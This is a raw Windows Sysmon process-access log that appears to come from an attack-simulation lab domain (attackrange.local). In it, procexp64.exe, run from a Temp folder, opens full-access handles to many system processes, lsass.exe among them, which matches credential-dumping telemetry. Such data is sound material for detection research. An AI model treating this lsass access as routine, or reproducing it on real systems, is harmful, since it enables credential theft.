15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792806Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792805Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792804Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792803Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792802Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792801Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792800Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792799Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792798Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792797Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792796Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792795Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792794Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792793Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792922Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792921Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792920Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792919Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792918Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792917Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792916Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792915Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792914Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792913Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792912Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792911Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792910Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792909Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792908Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792907Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792906Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792905Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792904Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792903Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792902Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792901Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792900Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 